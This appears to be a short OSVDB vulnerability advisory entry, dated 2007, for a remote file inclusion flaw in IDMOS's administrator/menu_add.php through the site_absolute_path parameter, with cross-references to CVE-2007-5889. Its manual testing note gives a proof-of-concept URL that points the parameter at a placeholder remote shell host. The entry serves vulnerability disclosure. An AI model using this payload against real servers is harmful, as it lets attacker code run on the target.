IDMOS menu_add.php site_absolute_path Variable Remote File Inclusion

2007-11-06T00:00:00
ID OSVDB:38736
Type osvdb
Reporter OSVDB
Modified 2007-11-06T00:00:00

Description

Manual Testing Notes

http://[target]/administrator/menu_add.php?site_absolute_path=http://shell?

References:

Related OSVDB ID: 38735 Related OSVDB ID: 38737 Keyword: Phoenix ISS X-Force ID: 38294 CVE-2007-5889